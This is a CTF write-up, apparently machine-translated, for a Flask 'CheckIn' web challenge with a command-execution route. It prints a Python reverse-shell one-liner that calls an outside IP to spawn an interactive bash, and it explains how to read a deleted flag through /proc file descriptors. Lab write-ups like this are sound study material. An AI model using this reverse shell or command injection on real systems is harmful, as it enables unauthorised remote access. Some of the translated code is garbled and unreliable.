V & N + recruit new assessment team, Zhao master the topic of Web, doing feel a little top, strike while recording write write up about the study of knowledge
This question is said to be CheckIn but it is still a certain degree of difficulty (I may have too dishes), the title given directly into the flask of the route:
from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # return flag ## want flag? naive! # You will never find the thing you want:) I think @app.route('/shell') def shell(): os.system("rm -f flag.txt") exec_cmd = request.args.get('c') os.system(exec_cmd) return "1" @app.route('/') def source(): return open("app.py","r").read() if __name__ == "__main__": app.run(host='0.0.0.0')
You can see the flask containing "/" and "/ shell" two pages, which are stored in flag.txt the Flag, "/ shell? C = $ command" can execute code
But once access / shell code that will "rm -f flag.txt" delete flag.txt, cause we can not directly cat /flag.txt (in fact, if not here, deleted files can not be directly cat, because there is no echo of)
Here knowledge leads to our first point: the file descriptor
What is the file descriptor: the kernel to access files using the file descriptor. Non-negative integer file descriptor. When you open an existing file or create a new file, the kernel returns a file descriptor. Read and write files also need to specify the file descriptor to be read and write files.
Such as Python, when we open () function to open a file it creates a file descriptor, and then use this to read the file descriptor () function is to read the contents of the file descriptor, close () function is used Close / destroy the file descriptor.
File descriptors stored somewhere: / proc / <pid> / fd <the above mentioned id>
In other words, we can get to a file descriptor by cat process fd.
Back to the topic, focusing on the subject line of the fifth Code:
flag_file = open("flag.txt", "r")
Here the use of open () is a priority to open flag.txt delete flag.txt, that before flag.txt been deleted file descriptor has been established, we can obtain Flag by reading the contents of this file descriptors.
But after "? / Shell c = $ command " test found that there is no echo, so at this time think of way is our second point: the rebound Shell
The establishment of a common command rebound Shell has bash, curl, nc, python -c, etc., but after tests found here these commonly used commands are banned, can not rebound Shell
Finally, think of python3 -c "command" command is executed after test execution can be found python3, constructed directly Shell:
python3 -c ' import socket,subprocess,os; s of = socket.socket, (socket.AF_INET, socket.SOCK_STREAM),; s.connect(("39.105.*.*",1234)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1 ); os.dup2 (s.fileno (), 2 ); p=subprocess.call(["/bin/bash","-i"]); '
C parameter to the request on our servers will be able to get an interactive Shell
Then into cd / proc directory sequentially into cd <pid> (that is, those numbers) directory, obtained using ls fd id
In turn try cat fd / 0 ... until Flag